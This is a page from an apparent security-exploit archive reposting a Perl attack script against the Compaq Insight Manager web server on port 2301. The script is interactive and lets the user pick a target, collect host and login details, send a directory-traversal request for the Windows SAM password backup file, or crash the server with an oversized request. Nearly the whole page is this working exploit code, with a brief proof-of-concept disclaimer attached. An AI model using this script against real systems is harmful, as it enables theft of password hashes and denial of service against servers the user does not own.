Welcome To Security.Fx-Vista.Com

Computer Security Information

Home

CompaqInsightManager Check & DoS 0.5

<< Back

 

Checks for the compaqInsightManager webserver which runs on port 2301. 
Shows info of the host running the CIM, Tries to get the 'SAM._' backup-file, 'DenialOfService' option. 
/* ---------------------------------------------------------- */
#!/usr/bin/perl
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# -- Looks for CompaqInsightManager webserver.
#
# -- Changes : configurable host, port and DoS
# -- Changed & updated by Gert <c> 2000
# -- http://www.isaan.org/
#
system ('cls');
use IO::Socket;
print("==================================================================\n");
print("======= CompaqInsightManager WEBserver info / check / DoS ========\n");
print("======= Code by Gert Fokkema <c>2000  http://www.isaan.org =======\n");
print("======= Beta version 0.5  Comments mailto:  cim\@isaan.org ========\n");
print("==================================================================\n");


print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
print(">: ");
$host = <STDIN>;

# CompaqInsightManager running on port 2301
print("Enter the port number of the host to connect e.g. 2301 : \n");
print(">: ");
#$port = <STDIN>;
$port = 2301;
print ("2301\n");

#
# queryselect
#
# CompaqInsightManager standard query "/cpqlogin.htm?" or "index.html"
sub queryselect
{
print("Select query to check for --1,2,3,4-- : \n");
print("1 : WEBserver INFO\n");
print("2 : WEBserver 'root dot dot vulnerability'\n");
print("3 : WEBserver DenialOfService attack\n");
print("0 : QUIT\n");
print("< : ");
$query_select = <STDIN>;

# 0 = QUIT
if($query_select == 0)
        {
        $query="";
        print "Selected type  : QUIT\n";
        &quit;
        }
# 1 = INFO $query="/cpqlogin.htm?"
if($query_select == 1)
        {
        $query="/cpqlogin.htm?";
        print "Selected type  : INFO\n";
        print "Selected query     : '/cpqlogin.htm?'\n";
        &connect;
        sleep(2);
        print("Press RETURN to continue...");
        $select = <STDIN>;
        system ('cls');
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
        &queryselect;
        }
# 2 = INFO $query="/../../../winnt/repair/sam._"
if($query_select == 2)
        {
        $query="/../../../winnt/repair/sam._";
        print "Selected type  : root dot dot vulnerability\n";
        print "Selected query     : '/../../../winnt/repair/sam._'\n";
        &connect;
        sleep(2);
        print("Press RETURN to continue...");
        $select = <STDIN>;
        system ('cls'); 
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
        &queryselect;
        }
# 3 = INFO $query=""
if($query_select == 3)
        {
        $query = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        print "Selected type  : DenialOfService attack\n";
        print "Selected query     : 'AAAAAAAAAA'\n";
        &connect;
        sleep(2);
        print("Press RETURN to continue...");
        $select = <STDIN>;
        system ('cls'); 
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
        &queryselect;
        }
print("Input not valid...try again!!\n");
sleep(2);
system ('cls');
        print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n");
        print(">: ");
        print ("$host");
        print("Enter the port number of the host to connect e.g. 2301 : \n");
        print(">: ");
        print ("2301\n");
&queryselect;
}
&queryselect;
#
# connect
#
sub connect
{
print("==================================================================\n");
print("Connecting to ip-address      : $host");
print("Trying connect host at port   : $port\n");
print("Query to check for            : $query\n");
print("==================================================================\n");
$privatename="unknown\n";
$username="unknown\n";
$privateip="unknown\n";
$publicip="unknown\n";
select STDOUT;
$| = 1;
select(STDOUT); $| = 1;
$handle = IO::Socket::INET->new(Proto => "tcp",
                                PeerAddr  => $host,
                                PeerPort  => $port, Reuse=>1)
|| die ">: connect failed to port $port on $host...exiting ;-(\n";
#                  or die "can't connect to port $port on $host: $!";
print ">: connect succesfull to port $port on $host...checking query ;-)\n";
$handle->autoflush(1);
print $handle "GET $query\\ HTTP/1.0\nTranslate: f\r\n\n";

$info = "";
$count=0;
while ($line = <$handle>)
        {$content = $content . $line;
        $count += 1;
#}
        if ($count == 13)
               {
               $privatename = $line;
               }
        else{}
        if ($count == 36)
               {
               $username = $line;
               }
        else{}
        if ($count == 56)
               {
               $privateip = $line;
               }
        else{}
        if ($count == 57)
               {
               $publicip = $line;
               }
        else{}
}
close $handle;
close($socket);
#print "Content-type: text/plain\n\n";
#print $content;
print("\n");
print("             ==========================================\n");
print "             == CompaqInsightManager WEBserver Info: ==\n";
print("             ==========================================\n");
print ("System name : $privatename");
print ("Login name  : $username");
print ("Private IP  : $privateip");
print ("Public IP   : $publicip");
print("==================================================================\n");
}
sub quit
{
close $handle;
close($socket);
print("localhost: done...");
exit
}
/* ---------------------------------------------------------- */

Credits
-- UnKnown --

<< Back

 

Copyright ©2008 www.Security.Fx-Vista.Com | All rights reserved